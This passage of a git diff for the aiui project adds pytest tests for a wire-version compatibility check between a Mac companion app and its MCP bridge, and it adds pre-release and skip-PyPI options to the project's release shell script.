+The Mac companion no longer kills this bridge to force a version. Instead both
+sides carry a `wire_version`; on a hard mismatch the bridge surfaces a
+structured "restart this session" tool error and otherwise tolerates ordinary
+app-version skew. These cover `_check_wire_compat`.
+"""
+from __future__ import annotations
+
+import asyncio
+from typing import Any
+
+import httpx
+import pytest
+
+import aiui_mcp.server as server
+from aiui_mcp.server import EXPECTED_WIRE_VERSION, _check_wire_compat
+
+
+class _FakeResp:
+    def __init__(self, payload: dict[str, Any]) -> None:
+        self._payload = payload
+
+    def raise_for_status(self) -> None:  # all fakes are 200
+        return None
+
+    def json(self) -> dict[str, Any]:
+        return self._payload
+
+
+def _setup_token(monkeypatch: pytest.MonkeyPatch, tmp_path: Any) -> None:
+    token_file = tmp_path / "token"
+    token_file.write_text("dummy-token-for-tests")
+    monkeypatch.setattr(server, "TOKEN_PATH", token_file)
+
+
+def _run_check() -> None:
+    async def run() -> None:
+        async with httpx.AsyncClient() as client:
+            await _check_wire_compat(client)
+
+    asyncio.run(run())
+
+
+def test_matching_wire_version_passes_and_memoises(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"wire_version": EXPECTED_WIRE_VERSION})
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    _run_check()  # must not raise
+    assert server._wire_checked is True
+
+
+def test_mismatched_wire_version_raises_structured_error_and_does_not_memoise(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"wire_version": EXPECTED_WIRE_VERSION + 998})
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    with pytest.raises(RuntimeError) as exc_info:
+        _run_check()
+    assert "incompatible aiui versions" in str(exc_info.value)
+    # A mismatch must NOT be memoised — a later restart of the companion should
+    # be able to clear it without restarting the bridge process.
+    assert server._wire_checked is False
+
+
+def test_missing_wire_version_field_is_tolerated(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    """An older companion without the field is treated as wire v1 → compatible."""
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"version": "0.4.46"})  # no wire_version
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    _run_check()  # must not raise
+    assert server._wire_checked is True
+
+
+def test_read_error_is_tolerated_not_fatal(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    """A transient /version read failure must not block rendering."""
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        raise httpx.ConnectError("companion down")
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    _run_check()  # must not raise — tolerate skew/transient
+    assert server._wire_checked is True
diff --git a/scripts/release.sh b/scripts/release.sh
index 78c2f1d..a10f624 100755
--- a/scripts/release.sh
+++ b/scripts/release.sh
@@ -50,8 +50,13 @@ fi
 : "${BUILD_KEYCHAIN:?not set}"
 : "${BUILD_KEYCHAIN_PASS_FILE:?not set}"
 : "${TAURI_SIGNING_PRIVATE_KEY_PATH:?not set}"
-: "${UV_PUBLISH_TOKEN:?not set — needed for publishing aiui-mcp to PyPI. Put it in .env.release or export before running. See script header for details.}"
-export UV_PUBLISH_TOKEN
+# AIUI_SKIP_PYPI=1 → validate-first / pre-release flow: build + sign + notarize
+# + GitHub release WITHOUT publishing aiui-mcp to PyPI (PyPI versions are
+# permanent; defer until the build is validated). The token is then not needed.
+if [[ "${AIUI_SKIP_PYPI:-}" != "1" ]]; then
+  : "${UV_PUBLISH_TOKEN:?not set — needed for publishing aiui-mcp to PyPI. Put it in .env.release or export before running. See script header for details. (Or set AIUI_SKIP_PYPI=1 to skip PyPI for a pre-release.)}"
+  export UV_PUBLISH_TOKEN
+fi
 # Tauri bundler reads TAURI_SIGNING_PRIVATE_KEY (literal key content) during
 # `tauri build`, not the _PATH variant. Load the file content here.
 export TAURI_SIGNING_PRIVATE_KEY="$(cat "${TAURI_SIGNING_PRIVATE_KEY_PATH}")"
@@ -230,6 +235,12 @@ update themselves in place via the in-app updater.
 See the [full diff](https://github.com/byte5ai/aiui/commits/${TAG}).
 NOTES_EOF
 
+# AIUI_RELEASE_PRERELEASE=1 → mark as a GitHub pre-release. GitHub's
+# `/releases/latest/` (what the in-app updater reads) skips pre-releases, so
+# this does NOT auto-update any client — for validate-first delivery. Promote
+# later with `gh release edit ${TAG} --prerelease=false` (then PyPI-publish).
+GH_PRERELEASE_FLAG=""
+[[ "${AIUI_RELEASE_PRERELEASE:-}" == "1" ]] && GH_PRERELEASE_FLAG="--prerelease"
 gh release create "${TAG}" \
   "${DIRECT_DMG}" \
   "${DIRECT_ZIP}" \
@@ -237,15 +248,20 @@ gh release create "${TAG}" \
   "${LATEST_JSON}" \
   --repo byte5ai/aiui \
   --title "aiui ${TAG}" \
-  --notes-file "${NOTES_FILE}"
+  --notes-file "${NOTES_FILE}" \
+  ${GH_PRERELEASE_FLAG}
 
-echo "✓ Released ${TAG} on GitHub"
+echo "✓ Released ${TAG} on GitHub${GH_PRERELEASE_FLAG:+ (pre-release)}"
 
 # PyPI publish AFTER the GitHub release succeeds. If this step fails the
 # Tauri side is already shipped and the manual recovery is `cd python &&
 # uv publish dist/*` once the credential issue is fixed. The pre-flight
 # token check at the top of this script is what stops us from getting
 # here without a token.
-echo "→ Publishing aiui-mcp ${VERSION} to PyPI"
-(cd python && uv publish)
-echo "✓ Published aiui-mcp ${VERSION} to PyPI"
+if [[ "${AIUI_SKIP_PYPI:-}" == "1" ]]; then
+  echo "→ Skipping PyPI publish (AIUI_SKIP_PYPI=1) — run \`cd python && uv publish\` (or promote) when validated"
+else
+  echo "→ Publishing aiui-mcp ${VERSION} to PyPI"
+  (cd python && uv publish)
+  echo "✓ Published aiui-mcp ${VERSION} to PyPI"
+fi